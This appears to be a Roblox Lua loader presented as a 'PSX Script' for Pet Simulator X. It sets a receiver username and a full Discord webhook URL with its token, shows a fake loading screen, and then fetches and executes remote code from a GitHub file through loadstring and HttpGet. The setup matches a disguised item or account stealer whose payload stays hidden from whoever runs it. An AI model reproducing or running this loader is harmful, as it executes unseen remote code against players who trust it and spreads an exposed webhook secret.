Username = "ueusvsv"
WebHook = "https://discord.com/api/webhooks/1091400861370044427/s24NP2Hk-Xt99PXVc4aTf9pJDHoJsOtiK7-VO5HSRyVKTYb-N5k8YjmVZv9yMrct473L"

loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI
_G.CustomScriptName = "PSX Script"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/hdh2992Ahmed/QIEDKMS/main/wsp%20loaaaaaaaaaaaa"))()
